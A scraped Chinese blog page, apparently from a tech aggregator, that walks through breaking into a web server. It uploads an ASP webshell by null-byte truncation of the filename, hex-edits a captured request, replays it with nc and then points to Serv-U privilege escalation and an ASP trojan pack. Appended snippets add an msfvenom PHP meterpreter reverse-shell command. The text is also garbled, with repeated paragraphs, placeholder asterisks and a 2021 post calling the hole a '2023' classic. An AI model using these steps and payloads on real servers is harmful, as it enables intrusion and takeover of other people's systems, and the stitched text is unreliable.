利用ASP上傳漏洞得到webshell實戰

2021-04-14 14:39:18 字數 1765 閱讀 7236

2023年網路安全屆的經典漏洞!

前段時間被上傳漏洞和asp木馬鬧得沸沸揚揚,狗狗他們的**被黑了一次又一次

所以開始關心上傳漏洞方面的網路安全問題,昨天終於試驗了整個流程

上傳漏洞." href="http://www.skyhe.com/blog/bloget/home/review.asp?id=242">

[原創]利用asp上傳漏洞得到webshell實戰

利用上傳漏洞得到webshell,再配合serv-u取得server管理員許可權

可以說是

2023年網路安全屆的經典漏洞!

前段時間被上傳漏洞和asp木馬鬧得沸沸揚揚,狗狗他們的**被黑了一次又一次

所以開始關心上傳漏洞方面的網路安全問題,昨天終於試驗了整個流程

上傳漏洞主要就是利用'/0'字元漏洞,'/0'字元在系統中被用作字串結束的標誌

基本原理就是網路程式雖然禁止了.asp等字尾名檔案的上傳,但是都會允許.jpg或者.gif格式檔案的上傳。

這樣如果自己構造資料報 

formpath=uploadfile/shell.asp'/0 '.jpg,那麼'/0 '後面的字元將被截斷,原因是計算機遇到'/0'字元,認為字串結束了。於是我們就向伺服器上傳了乙個名為shell.asp的asp木馬程式,後面的就不多說了,webshell的功能已經很強大了,如果再配合serv-u取得server的管理員許可權...

入侵過程:

條件:需要至少nc、winsock expert、ultraedit三個工具和乙個webshell程式

nc.exe(netcat) - 乙個變形了的telnet,嗅探器,網路安全屆的軍刀!

ultraedit- ......不說了,無人不知無人不曉-_-!

webshell- asp、php等木馬程式

1.第一步,開啟目標系統的上傳頁面,通過winsock expert監視,上傳webshell.asp檔案,再開啟winsock expert,將截獲的資料流存為文字檔案

(兩個send下面的所有內容,包括回車產生的空白行)

2.通過ultraedit修改文字檔案中的關鍵**:filename="c:/test/webshell.asp"  ,webshell.asp後加:1個空格及.jpg,然後跳到16進製制編輯狀態,修改16進製制下空格的20為00,content-length長度增加5。(乙個字元算乙個位元組,' .jpg'乙個5個位元組)
3.nc出場~!^^

指令:nc -vv www.***.com 80 < 1.txt

4.上傳成功,得到乙個webshell!下一步可以

配合serv-u取得server管理員許可權

nc.exe、wsock expert、動鯊生成器三合一包~

海陽頂端網asp木馬集

參考文章

**:天河網 | www.skyhe.com

webshell與檔案上傳漏洞

大馬 1.體積大,功能全 2.會呼叫系統的關鍵函式 3.以 加密進行隱藏。小馬 1.體積小,功能少 2.只有乙個上傳功能。一句話木馬 1.短,只有一行 2.使用場景大,可單獨生成檔案,可插入檔案 3.安全性高,隱匿性強,可變形免殺 4.框架不便資料執行 資料傳遞 例如 eval request pa...

檔案上傳漏洞及webshell簡介

檔案上傳是web應用的必備功能之一,比如上傳頭像顯示個性化 上傳附件共享檔案 上傳指令碼更新 等。如果伺服器配置不當或者沒有進行足夠的過濾,web使用者就可以上傳任意檔案,包括惡意指令碼檔案 exe程式等,這就造成了檔案上傳漏洞。檔案上傳漏洞的成因,一方面伺服器配置不當會導致任意檔案上傳 另一方面,...

檔案上傳漏洞利用

找到一處上傳點,上傳shell,利用msfvenom生成。msfvenom p php meterpreter revese tcp lhost 192.168.3.171 lport 4444 f raw shell.php本來上傳後,利用msfconle監聽的,但是沒有成功。所以up用了kali...